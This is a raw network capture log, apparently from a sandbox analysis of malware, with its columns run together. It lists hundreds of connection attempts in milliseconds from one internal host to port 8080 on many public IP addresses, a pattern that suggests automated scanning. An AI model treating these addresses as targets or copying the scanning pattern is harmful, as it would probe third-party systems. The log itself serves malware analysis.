                                                        Feb 14, 2024 09:32:44.022002935 CET407478080192.168.2.1431.108.98.217
                                                        Feb 14, 2024 09:32:44.022002935 CET407478080192.168.2.1462.201.87.146
                                                        Feb 14, 2024 09:32:44.022002935 CET407478080192.168.2.1494.97.64.0
                                                        Feb 14, 2024 09:32:44.022006989 CET407478080192.168.2.1462.121.157.164
                                                        Feb 14, 2024 09:32:44.022011042 CET407478080192.168.2.1431.172.41.140
                                                        Feb 14, 2024 09:32:44.022023916 CET407478080192.168.2.1462.149.60.224
                                                        Feb 14, 2024 09:32:44.022027969 CET407478080192.168.2.1495.177.129.46
                                                        Feb 14, 2024 09:32:44.022028923 CET407478080192.168.2.1462.38.153.239
                                                        Feb 14, 2024 09:32:44.022027969 CET407478080192.168.2.1495.83.158.155
                                                        Feb 14, 2024 09:32:44.022034883 CET407478080192.168.2.1495.53.250.30
                                                        Feb 14, 2024 09:32:44.022036076 CET407478080192.168.2.1431.130.125.129
                                                        Feb 14, 2024 09:32:44.022072077 CET407478080192.168.2.1495.130.144.174
                                                        Feb 14, 2024 09:32:44.022072077 CET407478080192.168.2.1485.159.113.171
                                                        Feb 14, 2024 09:32:44.022072077 CET407478080192.168.2.1494.199.137.122
                                                        Feb 14, 2024 09:32:44.022072077 CET407478080192.168.2.1495.144.167.154
                                                        Feb 14, 2024 09:32:44.022083998 CET407478080192.168.2.1462.32.57.69
                                                        Feb 14, 2024 09:32:44.022084951 CET407478080192.168.2.1462.124.25.48
                                                        Feb 14, 2024 09:32:44.022083998 CET407478080192.168.2.1495.21.222.61
                                                        Feb 14, 2024 09:32:44.022084951 CET407478080192.168.2.1485.41.171.78
                                                        Feb 14, 2024 09:32:44.022095919 CET407478080192.168.2.1431.176.127.39
                                                        Feb 14, 2024 09:32:44.022095919 CET407478080192.168.2.1431.63.241.163
                                                        Feb 14, 2024 09:32:44.022108078 CET407478080192.168.2.1431.254.43.120
                                                        Feb 14, 2024 09:32:44.022109985 CET407478080192.168.2.1462.254.130.147
                                                        Feb 14, 2024 09:32:44.022113085 CET407478080192.168.2.1431.69.171.205
                                                        Feb 14, 2024 09:32:44.022113085 CET407478080192.168.2.1494.215.17.119
                                                        Feb 14, 2024 09:32:44.022119999 CET407478080192.168.2.1485.189.221.41
                                                        Feb 14, 2024 09:32:44.022125006 CET407478080192.168.2.1485.215.200.121
                                                        Feb 14, 2024 09:32:44.022125006 CET407478080192.168.2.1431.101.79.56
                                                        Feb 14, 2024 09:32:44.022126913 CET407478080192.168.2.1495.197.156.45
                                                        Feb 14, 2024 09:32:44.022130966 CET407478080192.168.2.1485.50.240.128
                                                        Feb 14, 2024 09:32:44.022145033 CET407478080192.168.2.1462.79.202.122
                                                        Feb 14, 2024 09:32:44.022149086 CET407478080192.168.2.1431.125.65.73
                                                        Feb 14, 2024 09:32:44.022150993 CET407478080192.168.2.1495.145.172.163
                                                        Feb 14, 2024 09:32:44.022150993 CET407478080192.168.2.1495.11.91.85
                                                        Feb 14, 2024 09:32:44.022154093 CET407478080192.168.2.1494.122.147.45
                                                        Feb 14, 2024 09:32:44.022154093 CET407478080192.168.2.1462.137.50.115
                                                        Feb 14, 2024 09:32:44.022172928 CET407478080192.168.2.1431.197.66.252
                                                        Feb 14, 2024 09:32:44.022181988 CET407478080192.168.2.1494.24.181.193
                                                        Feb 14, 2024 09:32:44.022181988 CET407478080192.168.2.1494.164.211.152
                                                        Feb 14, 2024 09:32:44.022181988 CET407478080192.168.2.1485.226.79.210
                                                        Feb 14, 2024 09:32:44.022186041 CET407478080192.168.2.1485.178.128.229
                                                        Feb 14, 2024 09:32:44.022186041 CET407478080192.168.2.1495.17.128.68
                                                        Feb 14, 2024 09:32:44.022186041 CET407478080192.168.2.1495.138.41.182
                                                        Feb 14, 2024 09:32:44.022206068 CET407478080192.168.2.1462.167.85.27
                                                        Feb 14, 2024 09:32:44.022206068 CET407478080192.168.2.1485.253.230.188
                                                        Feb 14, 2024 09:32:44.022212982 CET407478080192.168.2.1495.187.148.43
                                                        Feb 14, 2024 09:32:44.022212982 CET407478080192.168.2.1494.147.164.66
                                                        Feb 14, 2024 09:32:44.022222042 CET407478080192.168.2.1494.153.229.172
                                                        Feb 14, 2024 09:32:44.022231102 CET407478080192.168.2.1485.194.179.53
                                                        Feb 14, 2024 09:32:44.022239923 CET407478080192.168.2.1494.43.72.95
                                                        Feb 14, 2024 09:32:44.022239923 CET407478080192.168.2.1485.189.75.95
                                                        Feb 14, 2024 09:32:44.022243023 CET407478080192.168.2.1495.139.152.60
                                                        Feb 14, 2024 09:32:44.022253990 CET407478080192.168.2.1495.68.41.153
                                                        Feb 14, 2024 09:32:44.022255898 CET407478080192.168.2.1494.28.153.101
                                                        Feb 14, 2024 09:32:44.022254944 CET407478080192.168.2.1462.74.147.169
                                                        Feb 14, 2024 09:32:44.022255898 CET407478080192.168.2.1431.95.240.85
                                                        Feb 14, 2024 09:32:44.022269964 CET407478080192.168.2.1431.223.228.119
                                                        Feb 14, 2024 09:32:44.022272110 CET407478080192.168.2.1485.230.184.129
                                                        Feb 14, 2024 09:32:44.022284985 CET407478080192.168.2.1495.20.240.140
                                                        Feb 14, 2024 09:32:44.022285938 CET407478080192.168.2.1462.82.213.176
                                                        Feb 14, 2024 09:32:44.022284985 CET407478080192.168.2.1494.210.159.108
                                                        Feb 14, 2024 09:32:44.022288084 CET407478080192.168.2.1431.39.44.108
                                                        Feb 14, 2024 09:32:44.022284985 CET407478080192.168.2.1494.91.55.104
                                                        Feb 14, 2024 09:32:44.022284985 CET407478080192.168.2.1494.90.233.149
                                                        Feb 14, 2024 09:32:44.022286892 CET407478080192.168.2.1495.139.79.168
                                                        Feb 14, 2024 09:32:44.022284985 CET407478080192.168.2.1494.16.224.123
                                                        Feb 14, 2024 09:32:44.022286892 CET407478080192.168.2.1485.102.124.226
                                                        Feb 14, 2024 09:32:44.022300005 CET407478080192.168.2.1485.193.127.128
                                                        Feb 14, 2024 09:32:44.022319078 CET407478080192.168.2.1485.91.93.86
                                                        Feb 14, 2024 09:32:44.022319078 CET407478080192.168.2.1495.82.205.30
                                                        Feb 14, 2024 09:32:44.022320032 CET407478080192.168.2.1485.248.214.153
                                                        Feb 14, 2024 09:32:44.022334099 CET407478080192.168.2.1431.255.47.14
                                                        Feb 14, 2024 09:32:44.022335052 CET407478080192.168.2.1462.222.108.107
                                                        Feb 14, 2024 09:32:44.022335052 CET407478080192.168.2.1485.67.250.180
                                                        Feb 14, 2024 09:32:44.022339106 CET407478080192.168.2.1485.62.206.84
                                                        Feb 14, 2024 09:32:44.022345066 CET407478080192.168.2.1485.221.239.111
                                                        Feb 14, 2024 09:32:44.022345066 CET407478080192.168.2.1462.38.217.42
                                                        Feb 14, 2024 09:32:44.022353888 CET407478080192.168.2.1462.233.99.235
                                                        Feb 14, 2024 09:32:44.022383928 CET407478080192.168.2.1495.155.142.162
                                                        Feb 14, 2024 09:32:44.022384882 CET407478080192.168.2.1485.123.115.194
                                                        Feb 14, 2024 09:32:44.022384882 CET407478080192.168.2.1495.166.215.71
                                                        Feb 14, 2024 09:32:44.022384882 CET407478080192.168.2.1485.144.239.54
                                                        Feb 14, 2024 09:32:44.022384882 CET407478080192.168.2.1462.58.254.138
                                                        Feb 14, 2024 09:32:44.022392988 CET407478080192.168.2.1495.21.136.82
                                                        Feb 14, 2024 09:32:44.022392988 CET407478080192.168.2.1495.53.90.251
                                                        Feb 14, 2024 09:32:44.022396088 CET407478080192.168.2.1494.110.217.223
                                                        Feb 14, 2024 09:32:44.022396088 CET407478080192.168.2.1495.175.181.95
                                                        Feb 14, 2024 09:32:44.022404909 CET407478080192.168.2.1485.57.197.196
                                                        Feb 14, 2024 09:32:44.022414923 CET407478080192.168.2.1494.148.101.199
                                                        Feb 14, 2024 09:32:44.022427082 CET407478080192.168.2.1462.62.85.42
                                                        Feb 14, 2024 09:32:44.022428036 CET407478080192.168.2.1495.194.79.229
                                                        Feb 14, 2024 09:32:44.022428989 CET407478080192.168.2.1485.79.180.34
                                                        Feb 14, 2024 09:32:44.022450924 CET407478080192.168.2.1431.50.45.26
                                                        Feb 14, 2024 09:32:44.022452116 CET407478080192.168.2.1494.227.6.57
                                                        Feb 14, 2024 09:32:44.022454023 CET407478080192.168.2.1431.239.212.56
                                                        Feb 14, 2024 09:32:44.022452116 CET407478080192.168.2.1431.62.226.195
                                                        Feb 14, 2024 09:32:44.022456884 CET407478080192.168.2.1462.80.13.208
                                                        Feb 14, 2024 09:32:44.022459030 CET407478080192.168.2.1485.68.7.151
                                                        Feb 14, 2024 09:32:44.022456884 CET407478080192.168.2.1494.24.56.220
                                                        Feb 14, 2024 09:32:44.022470951 CET407478080192.168.2.1485.130.248.237
                                                        Feb 14, 2024 09:32:44.022473097 CET407478080192.168.2.1485.18.130.32
                                                        Feb 14, 2024 09:32:44.022475004 CET407478080192.168.2.1462.192.253.181
                                                        Feb 14, 2024 09:32:44.022492886 CET407478080192.168.2.1495.0.226.205
                                                        Feb 14, 2024 09:32:44.022494078 CET407478080192.168.2.1431.81.170.36
                                                        Feb 14, 2024 09:32:44.022495985 CET407478080192.168.2.1431.136.96.21
                                                        Feb 14, 2024 09:32:44.022504091 CET407478080192.168.2.1485.230.144.207
                                                        Feb 14, 2024 09:32:44.022505045 CET407478080192.168.2.1495.59.230.112
                                                        Feb 14, 2024 09:32:44.022515059 CET407478080192.168.2.1494.148.151.245
                                                        Feb 14, 2024 09:32:44.022520065 CET407478080192.168.2.1485.15.185.64
                                                        Feb 14, 2024 09:32:44.022522926 CET407478080192.168.2.1485.246.28.1
                                                        Feb 14, 2024 09:32:44.022532940 CET407478080192.168.2.1494.26.186.230
                                                        Feb 14, 2024 09:32:44.022532940 CET407478080192.168.2.1485.253.183.237
                                                        Feb 14, 2024 09:32:44.022536993 CET407478080192.168.2.1462.12.71.157
                                                        Feb 14, 2024 09:32:44.022536993 CET407478080192.168.2.1462.154.151.152
                                                        Feb 14, 2024 09:32:44.022547960 CET407478080192.168.2.1495.201.164.21
                                                        Feb 14, 2024 09:32:44.022547960 CET407478080192.168.2.1462.203.227.29
                                                        Feb 14, 2024 09:32:44.022548914 CET407478080192.168.2.1485.117.8.164
                                                        Feb 14, 2024 09:32:44.022550106 CET407478080192.168.2.1485.204.154.176
                                                        Feb 14, 2024 09:32:44.022566080 CET407478080192.168.2.1431.124.205.92
                                                        Feb 14, 2024 09:32:44.022569895 CET407478080192.168.2.1431.248.127.156
                                                        Feb 14, 2024 09:32:44.022571087 CET407478080192.168.2.1462.90.239.113
                                                        Feb 14, 2024 09:32:44.022573948 CET407478080192.168.2.1431.157.61.130
                                                        Feb 14, 2024 09:32:44.022577047 CET407478080192.168.2.1462.170.240.138
                                                        Feb 14, 2024 09:32:44.022587061 CET407478080192.168.2.1462.109.102.140
                                                        Feb 14, 2024 09:32:44.022603989 CET407478080192.168.2.1495.10.249.218
                                                        Feb 14, 2024 09:32:44.022603989 CET407478080192.168.2.1485.229.40.222
                                                        Feb 14, 2024 09:32:44.022604942 CET407478080192.168.2.1494.240.231.3
                                                        Feb 14, 2024 09:32:44.022604942 CET407478080192.168.2.1494.194.117.50
                                                        Feb 14, 2024 09:32:44.022608042 CET407478080192.168.2.1462.240.231.118
                                                        Feb 14, 2024 09:32:44.022608042 CET407478080192.168.2.1462.246.182.7
                                                        Feb 14, 2024 09:32:44.022617102 CET407478080192.168.2.1495.134.228.22
                                                        Feb 14, 2024 09:32:44.022617102 CET407478080192.168.2.1485.247.143.73
                                                        Feb 14, 2024 09:32:44.022630930 CET407478080192.168.2.1431.242.113.2
                                                        Feb 14, 2024 09:32:44.022631884 CET407478080192.168.2.1495.117.88.229
                                                        Feb 14, 2024 09:32:44.022631884 CET407478080192.168.2.1495.63.138.157
                                                        Feb 14, 2024 09:32:44.022631884 CET407478080192.168.2.1431.211.120.87
                                                        Feb 14, 2024 09:32:44.022630930 CET407478080192.168.2.1494.142.107.217
                                                        Feb 14, 2024 09:32:44.022653103 CET407478080192.168.2.1495.160.233.37
                                                        Feb 14, 2024 09:32:44.022653103 CET407478080192.168.2.1495.115.35.191
                                                        Feb 14, 2024 09:32:44.022663116 CET407478080192.168.2.1431.132.155.0
                                                        Feb 14, 2024 09:32:44.022671938 CET407478080192.168.2.1431.204.193.122
                                                        Feb 14, 2024 09:32:44.022671938 CET407478080192.168.2.1494.36.32.128
                                                        Feb 14, 2024 09:32:44.022680044 CET407478080192.168.2.1495.7.10.58
                                                        Feb 14, 2024 09:32:44.022686005 CET407478080192.168.2.1485.55.248.19
                                                        Feb 14, 2024 09:32:44.022686958 CET407478080192.168.2.1494.178.208.77
                                                        Feb 14, 2024 09:32:44.022696018 CET407478080192.168.2.1462.196.117.181
                                                        Feb 14, 2024 09:32:44.022700071 CET407478080192.168.2.1462.143.73.15
                                                        Feb 14, 2024 09:32:44.022701025 CET407478080192.168.2.1494.145.167.254
                                                        Feb 14, 2024 09:32:44.022712946 CET407478080192.168.2.1485.71.8.176
                                                        Feb 14, 2024 09:32:44.022712946 CET407478080192.168.2.1494.54.221.55
                                                        Feb 14, 2024 09:32:44.022722006 CET407478080192.168.2.1462.243.44.121
                                                        Feb 14, 2024 09:32:44.022725105 CET407478080192.168.2.1495.222.161.222
                                                        Feb 14, 2024 09:32:44.022726059 CET407478080192.168.2.1431.219.96.205
                                                        Feb 14, 2024 09:32:44.022726059 CET407478080192.168.2.1431.4.149.76
                                                        Feb 14, 2024 09:32:44.022727013 CET407478080192.168.2.1485.88.171.176
                                                        Feb 14, 2024 09:32:44.022749901 CET407478080192.168.2.1494.149.101.118
                                                        Feb 14, 2024 09:32:44.022749901 CET407478080192.168.2.1494.249.9.46
                                                        Feb 14, 2024 09:32:44.022753000 CET407478080192.168.2.1485.155.137.159
                                                        Feb 14, 2024 09:32:44.022756100 CET407478080192.168.2.1495.188.25.78
                                                        Feb 14, 2024 09:32:44.022756100 CET407478080192.168.2.1462.112.176.83
                                                        Feb 14, 2024 09:32:44.022759914 CET407478080192.168.2.1462.108.47.186
                                                        Feb 14, 2024 09:32:44.022768974 CET407478080192.168.2.1495.53.70.150
                                                        Feb 14, 2024 09:32:44.022774935 CET407478080192.168.2.1431.43.20.255
                                                        Feb 14, 2024 09:32:44.022785902 CET407478080192.168.2.1494.76.23.12
                                                        Feb 14, 2024 09:32:44.022789001 CET407478080192.168.2.1462.230.186.12
                                                        Feb 14, 2024 09:32:44.022789001 CET407478080192.168.2.1462.152.64.137
                                                        Feb 14, 2024 09:32:44.022789001 CET407478080192.168.2.1485.37.115.129
                                                        Feb 14, 2024 09:32:44.022799969 CET407478080192.168.2.1494.100.244.94
                                                        Feb 14, 2024 09:32:44.022804976 CET407478080192.168.2.1485.1.109.129
                                                        Feb 14, 2024 09:32:44.022805929 CET407478080192.168.2.1462.92.3.187
                                                        Feb 14, 2024 09:32:44.022806883 CET407478080192.168.2.1462.47.85.217
                                                        Feb 14, 2024 09:32:44.022806883 CET407478080192.168.2.1494.112.53.161
                                                        Feb 14, 2024 09:32:44.022809029 CET407478080192.168.2.1485.48.76.19
                                                        Feb 14, 2024 09:32:44.022809029 CET407478080192.168.2.1495.79.136.72
                                                        Feb 14, 2024 09:32:44.022821903 CET407478080192.168.2.1495.94.149.102
                                                        Feb 14, 2024 09:32:44.022835970 CET407478080192.168.2.1495.141.129.198
                                                        Feb 14, 2024 09:32:44.022840023 CET407478080192.168.2.1462.217.225.149
                                                        Feb 14, 2024 09:32:44.022840023 CET407478080192.168.2.1485.38.156.238
                                                        Feb 14, 2024 09:32:44.022842884 CET407478080192.168.2.1431.8.35.60
                                                        Feb 14, 2024 09:32:44.022845030 CET407478080192.168.2.1462.137.131.153
                                                        Feb 14, 2024 09:32:44.022844076 CET407478080192.168.2.1495.17.112.96
                                                        Feb 14, 2024 09:32:44.022845030 CET407478080192.168.2.1495.217.127.129
                                                        Feb 14, 2024 09:32:44.022876024 CET407478080192.168.2.1485.222.220.160
                                                        Feb 14, 2024 09:32:44.022878885 CET407478080192.168.2.1494.35.108.66
                                                        Feb 14, 2024 09:32:44.022878885 CET407478080192.168.2.1431.84.163.151
                                                        Feb 14, 2024 09:32:44.022880077 CET407478080192.168.2.1431.19.113.167
                                                        Feb 14, 2024 09:32:44.022878885 CET407478080192.168.2.1495.223.222.40
                                                        Feb 14, 2024 09:32:44.022880077 CET407478080192.168.2.1462.11.141.252
                                                        Feb 14, 2024 09:32:44.022880077 CET407478080192.168.2.1494.232.35.96
                                                        Feb 14, 2024 09:32:44.022901058 CET407478080192.168.2.1485.0.212.137
                                                        Feb 14, 2024 09:32:44.022903919 CET407478080192.168.2.1462.90.200.158
                                                        Feb 14, 2024 09:32:44.022903919 CET407478080192.168.2.1495.222.146.114
                                                        Feb 14, 2024 09:32:44.022910118 CET407478080192.168.2.1462.223.115.95
                                                        Feb 14, 2024 09:32:44.022910118 CET407478080192.168.2.1431.37.117.155
                                                        Feb 14, 2024 09:32:44.022910118 CET407478080192.168.2.1494.119.190.167
                                                        Feb 14, 2024 09:32:44.022913933 CET407478080192.168.2.1485.90.170.149
                                                        Feb 14, 2024 09:32:44.022921085 CET407478080192.168.2.1431.88.174.64
                                                        Feb 14, 2024 09:32:44.022931099 CET407478080192.168.2.1494.216.153.213
                                                        Feb 14, 2024 09:32:44.022931099 CET407478080192.168.2.1431.249.220.198
                                                        Feb 14, 2024 09:32:44.022938013 CET407478080192.168.2.1485.192.96.185
                                                        Feb 14, 2024 09:32:44.022938013 CET407478080192.168.2.1431.197.54.255
                                                        Feb 14, 2024 09:32:44.022945881 CET407478080192.168.2.1495.198.230.39
                                                        Feb 14, 2024 09:32:44.022945881 CET407478080192.168.2.1462.119.70.152
                                                        Feb 14, 2024 09:32:44.022949934 CET407478080192.168.2.1431.112.116.243
                                                        Feb 14, 2024 09:32:44.022955894 CET407478080192.168.2.1462.223.151.27
                                                        Feb 14, 2024 09:32:44.022959948 CET407478080192.168.2.1485.136.157.136
                                                        Feb 14, 2024 09:32:44.022960901 CET407478080192.168.2.1462.1.136.132
                                                        Feb 14, 2024 09:32:44.022959948 CET407478080192.168.2.1494.224.159.77
                                                        Feb 14, 2024 09:32:44.022960901 CET407478080192.168.2.1462.240.249.115
                                                        Feb 14, 2024 09:32:44.022960901 CET407478080192.168.2.1485.96.137.179
                                                        Feb 14, 2024 09:32:44.022979021 CET407478080192.168.2.1485.91.76.53
                                                        Feb 14, 2024 09:32:44.023000956 CET407478080192.168.2.1485.166.90.195
                                                        Feb 14, 2024 09:32:44.023005009 CET407478080192.168.2.1485.60.168.247
                                                        Feb 14, 2024 09:32:44.023005962 CET407478080192.168.2.1462.182.67.148
                                                        Feb 14, 2024 09:32:44.023005009 CET407478080192.168.2.1485.168.129.70
                                                        Feb 14, 2024 09:32:44.023006916 CET407478080192.168.2.1494.56.204.200
                                                        Feb 14, 2024 09:32:44.023006916 CET407478080192.168.2.1431.224.202.131
                                                        Feb 14, 2024 09:32:44.023005009 CET407478080192.168.2.1485.122.154.247
                                                        Feb 14, 2024 09:32:44.023006916 CET407478080192.168.2.1431.28.147.183
                                                        Feb 14, 2024 09:32:44.023016930 CET407478080192.168.2.1462.16.43.112
                                                        Feb 14, 2024 09:32:44.023039103 CET407478080192.168.2.1495.145.100.81
                                                        Feb 14, 2024 09:32:44.023039103 CET407478080192.168.2.1495.241.119.187
                                                        Feb 14, 2024 09:32:44.023040056 CET407478080192.168.2.1485.79.96.57
                                                        Feb 14, 2024 09:32:44.023047924 CET407478080192.168.2.1495.255.151.214
                                                        Feb 14, 2024 09:32:44.023051977 CET407478080192.168.2.1431.106.72.135
                                                        Feb 14, 2024 09:32:44.023051977 CET407478080192.168.2.1495.102.69.56
                                                        Feb 14, 2024 09:32:44.023051977 CET407478080192.168.2.1462.159.197.209
                                                        Feb 14, 2024 09:32:44.023056984 CET407478080192.168.2.1494.34.15.208
                                                        Feb 14, 2024 09:32:44.023060083 CET407478080192.168.2.1494.241.141.140
                                                        Feb 14, 2024 09:32:44.023060083 CET407478080192.168.2.1485.152.168.70
                                                        Feb 14, 2024 09:32:44.023075104 CET407478080192.168.2.1431.97.4.254
                                                        Feb 14, 2024 09:32:44.023075104 CET407478080192.168.2.1495.214.236.233
                                                        Feb 14, 2024 09:32:44.023081064 CET407478080192.168.2.1494.220.17.175
                                                        Feb 14, 2024 09:32:44.023081064 CET407478080192.168.2.1485.63.131.75
                                                        Feb 14, 2024 09:32:44.023083925 CET407478080192.168.2.1431.62.213.15
                                                        Feb 14, 2024 09:32:44.023083925 CET407478080192.168.2.1485.68.233.89
                                                        Feb 14, 2024 09:32:44.023091078 CET407478080192.168.2.1485.51.25.214
                                                        Feb 14, 2024 09:32:44.023099899 CET407478080192.168.2.1494.89.130.219
                                                        Feb 14, 2024 09:32:44.023103952 CET407478080192.168.2.1494.50.214.77
                                                        Feb 14, 2024 09:32:44.023107052 CET407478080192.168.2.1431.181.105.152
                                                        Feb 14, 2024 09:32:44.023121119 CET407478080192.168.2.1462.142.222.126
                                                        Feb 14, 2024 09:32:44.023125887 CET407478080192.168.2.1494.214.199.134
                                                        Feb 14, 2024 09:32:44.023127079 CET407478080192.168.2.1431.227.49.133
                                                        Feb 14, 2024 09:32:44.023153067 CET407478080192.168.2.1494.57.101.212
                                                        Feb 14, 2024 09:32:44.023158073 CET407478080192.168.2.1495.102.73.129
                                                        Feb 14, 2024 09:32:44.023154974 CET407478080192.168.2.1462.92.161.96
                                                        Feb 14, 2024 09:32:44.023158073 CET407478080192.168.2.1462.39.195.154
                                                        Feb 14, 2024 09:32:44.023154974 CET407478080192.168.2.1485.238.247.250
                                                        Feb 14, 2024 09:32:44.023164034 CET407478080192.168.2.1485.210.244.216
                                                        Feb 14, 2024 09:32:44.023179054 CET233332385.134.26.112192.168.2.14
                                                        Feb 14, 2024 09:32:44.023184061 CET407478080192.168.2.1495.94.98.33
                                                        Feb 14, 2024 09:32:44.023185968 CET407478080192.168.2.1485.179.164.191
                                                        Feb 14, 2024 09:32:44.023185968 CET407478080192.168.2.1485.4.177.145
                                                        Feb 14, 2024 09:32:44.023190022 CET407478080192.168.2.1494.36.247.30
                                                        Feb 14, 2024 09:32:44.023194075 CET407478080192.168.2.1495.70.153.234
                                                        Feb 14, 2024 09:32:44.023194075 CET407478080192.168.2.1485.26.192.126
                                                        Feb 14, 2024 09:32:44.023194075 CET407478080192.168.2.1431.166.64.249
                                                        Feb 14, 2024 09:32:44.023200035 CET407478080192.168.2.1495.27.225.77
                                                        Feb 14, 2024 09:32:44.023221970 CET407478080192.168.2.1431.41.38.100
                                                        Feb 14, 2024 09:32:44.023226023 CET407478080192.168.2.1485.159.103.70
                                                        Feb 14, 2024 09:32:44.023235083 CET407478080192.168.2.1431.95.15.231
                                                        Feb 14, 2024 09:32:44.023235083 CET407478080192.168.2.1431.141.68.198
                                                        Feb 14, 2024 09:32:44.023236036 CET407478080192.168.2.1485.255.98.203
                                                        Feb 14, 2024 09:32:44.023248911 CET407478080192.168.2.1495.220.131.0
                                                        Feb 14, 2024 09:32:44.023257971 CET407478080192.168.2.1485.97.112.58
                                                        Feb 14, 2024 09:32:44.023257971 CET407478080192.168.2.1494.103.202.114
                                                        Feb 14, 2024 09:32:44.023258924 CET407478080192.168.2.1485.244.82.164
                                                        Feb 14, 2024 09:32:44.023267984 CET407478080192.168.2.1495.121.230.243
                                                        Feb 14, 2024 09:32:44.023267984 CET407478080192.168.2.1485.233.178.78
                                                        Feb 14, 2024 09:32:44.023268938 CET407478080192.168.2.1495.200.90.33
                                                        Feb 14, 2024 09:32:44.023277044 CET407478080192.168.2.1494.50.52.244
                                                        Feb 14, 2024 09:32:44.023289919 CET407478080192.168.2.1494.33.47.61
                                                        Feb 14, 2024 09:32:44.023297071 CET407478080192.168.2.1462.226.205.95
                                                        Feb 14, 2024 09:32:44.023299932 CET407478080192.168.2.1494.39.75.125
                                                        Feb 14, 2024 09:32:44.023299932 CET407478080192.168.2.1485.26.51.194
                                                        Feb 14, 2024 09:32:44.023304939 CET407478080192.168.2.1485.7.188.139
                                                        Feb 14, 2024 09:32:44.023312092 CET407478080192.168.2.1495.110.129.136
                                                        Feb 14, 2024 09:32:44.023312092 CET407478080192.168.2.1431.232.205.163
                                                        Feb 14, 2024 09:32:44.023317099 CET407478080192.168.2.1495.79.174.28
                                                        Feb 14, 2024 09:32:44.023319006 CET407478080192.168.2.1462.152.27.54
                                                        Feb 14, 2024 09:32:44.023329973 CET407478080192.168.2.1431.129.90.5
                                                        Feb 14, 2024 09:32:44.023333073 CET407478080192.168.2.1485.100.59.78
                                                        Feb 14, 2024 09:32:44.023343086 CET407478080192.168.2.1485.24.128.218
                                                        Feb 14, 2024 09:32:44.023351908 CET407478080192.168.2.1495.29.59.245
                                                        Feb 14, 2024 09:32:44.023351908 CET407478080192.168.2.1495.61.15.152
                                                        Feb 14, 2024 09:32:44.023351908 CET407478080192.168.2.1495.55.215.60
                                                        Feb 14, 2024 09:32:44.023353100 CET407478080192.168.2.1495.21.171.34
                                                        Feb 14, 2024 09:32:44.023371935 CET407478080192.168.2.1494.192.172.134
                                                        Feb 14, 2024 09:32:44.023387909 CET407478080192.168.2.1462.22.125.225
                                                        Feb 14, 2024 09:32:44.023386955 CET407478080192.168.2.1431.7.113.17
                                                        Feb 14, 2024 09:32:44.023391008 CET407478080192.168.2.1462.55.123.168
                                                        Feb 14, 2024 09:32:44.023391962 CET407478080192.168.2.1431.255.70.170
                                                        Feb 14, 2024 09:32:44.023392916 CET407478080192.168.2.1485.229.121.252
                                                        Feb 14, 2024 09:32:44.023391962 CET407478080192.168.2.1495.120.174.141
                                                        Feb 14, 2024 09:32:44.023392916 CET407478080192.168.2.1494.247.75.191
                                                        Feb 14, 2024 09:32:44.023391008 CET407478080192.168.2.1485.210.6.239
                                                        Feb 14, 2024 09:32:44.023401976 CET407478080192.168.2.1462.120.130.113
                                                        Feb 14, 2024 09:32:44.023401976 CET407478080192.168.2.1462.114.4.27
                                                        Feb 14, 2024 09:32:44.023415089 CET407478080192.168.2.1462.151.40.86
                                                        Feb 14, 2024 09:32:44.023422003 CET407478080192.168.2.1495.94.193.183
                                                        Feb 14, 2024 09:32:44.023422003 CET407478080192.168.2.1462.252.72.43
                                                        Feb 14, 2024 09:32:44.023422003 CET407478080192.168.2.1495.7.35.188
                                                        Feb 14, 2024 09:32:44.023443937 CET407478080192.168.2.1431.130.87.144
                                                        Feb 14, 2024 09:32:44.023447990 CET407478080192.168.2.1462.244.60.9
                                                        Feb 14, 2024 09:32:44.023447990 CET407478080192.168.2.1462.250.180.152
                                                        Feb 14, 2024 09:32:44.023451090 CET407478080192.168.2.1431.247.120.90
                                                        Feb 14, 2024 09:32:44.023451090 CET407478080192.168.2.1462.25.49.179
                                                        Feb 14, 2024 09:32:44.023452044 CET407478080192.168.2.1485.223.236.158
                                                        Feb 14, 2024 09:32:44.023458004 CET407478080192.168.2.1485.220.151.103
                                                        Feb 14, 2024 09:32:44.023458004 CET407478080192.168.2.1495.130.92.124
                                                        Feb 14, 2024 09:32:44.023468018 CET407478080192.168.2.1485.108.42.208
                                                        Feb 14, 2024 09:32:44.023468018 CET407478080192.168.2.1494.180.6.200
                                                        Feb 14, 2024 09:32:44.023468018 CET407478080192.168.2.1495.6.69.196
                                                        Feb 14, 2024 09:32:44.023471117 CET407478080192.168.2.1431.151.237.110
                                                        Feb 14, 2024 09:32:44.023490906 CET407478080192.168.2.1431.82.174.115
                                                        Feb 14, 2024 09:32:44.023492098 CET407478080192.168.2.1431.48.187.235
                                                        Feb 14, 2024 09:32:44.023493052 CET407478080192.168.2.1495.243.108.79
                                                        Feb 14, 2024 09:32:44.023499966 CET407478080192.168.2.1495.89.98.240
                                                        Feb 14, 2024 09:32:44.023502111 CET407478080192.168.2.1462.90.153.12
                                                        Feb 14, 2024 09:32:44.023504019 CET407478080192.168.2.1494.65.154.225
                                                        Feb 14, 2024 09:32:44.023504019 CET407478080192.168.2.1485.224.1.165
                                                        Feb 14, 2024 09:32:44.023509979 CET407478080192.168.2.1462.106.255.123
                                                        Feb 14, 2024 09:32:44.023529053 CET407478080192.168.2.1485.80.240.105
                                                        Feb 14, 2024 09:32:44.023530006 CET407478080192.168.2.1431.244.61.63
                                                        Feb 14, 2024 09:32:44.023529053 CET407478080192.168.2.1431.245.183.116
                                                        Feb 14, 2024 09:32:44.023529053 CET407478080192.168.2.1431.122.153.61
                                                        Feb 14, 2024 09:32:44.023538113 CET407478080192.168.2.1494.133.139.62
                                                        Feb 14, 2024 09:32:44.023540974 CET407478080192.168.2.1462.95.81.168
                                                        Feb 14, 2024 09:32:44.023540020 CET407478080192.168.2.1485.186.72.106
                                                        Feb 14, 2024 09:32:44.023550034 CET407478080192.168.2.1431.236.126.39
                                                        Feb 14, 2024 09:32:44.023555994 CET407478080192.168.2.1495.155.27.163
                                                        Feb 14, 2024 09:32:44.023555994 CET407478080192.168.2.1495.177.69.176
                                                        Feb 14, 2024 09:32:44.023555994 CET407478080192.168.2.1495.197.12.186
                                                        Feb 14, 2024 09:32:44.023565054 CET407478080192.168.2.1462.5.38.49
                                                        Feb 14, 2024 09:32:44.023570061 CET407478080192.168.2.1485.71.242.23
                                                        Feb 14, 2024 09:32:44.023574114 CET407478080192.168.2.1485.95.154.205
                                                        Feb 14, 2024 09:32:44.023576021 CET407478080192.168.2.1462.228.131.82
                                                        Feb 14, 2024 09:32:44.023576021 CET407478080192.168.2.1431.93.228.14
                                                        Feb 14, 2024 09:32:44.023592949 CET407478080192.168.2.1462.74.117.217
                                                        Feb 14, 2024 09:32:44.023592949 CET407478080192.168.2.1495.236.169.44
